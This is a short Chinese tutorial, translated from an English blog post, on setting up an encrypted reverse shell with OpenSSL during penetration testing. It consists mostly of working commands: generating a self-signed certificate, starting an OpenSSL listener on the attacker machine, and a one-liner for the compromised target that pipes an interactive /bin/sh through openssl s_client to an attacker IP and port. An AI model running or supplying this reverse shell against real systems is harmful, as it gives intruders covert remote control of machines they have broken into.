利用OpenSSL搭建一个反弹shell

渗透测试时有很多方法可以获得一个反弹shell，例如netcat、php、perl、.net、lolbins等等。但我最喜欢的方法之一利用是Openssl来获得一个反弹shell。是的，就是那个几乎每个https都要使用的库，我们先用openssl来生成密钥，最后再使用它来获取一个反弹shell。

准备

首先我们需要在自己的机器上生成密钥，这里用kali来演示。

root@kali# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

启动监听（渗透机器）

openssl s_server -quiet -key key.pem -cert cert.pem -port <PORT>

反弹shell（目标机器）

最后在目标机器，也就是你所攻破的机器，运行如下命令：

low-user@pwned#: mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s

本文由白帽汇整理并翻译，不代表白帽汇任何观点和立场
来源：https://medium.com/@int0x33/day-43-reverse-shell-with-openssl-1ee2574aa998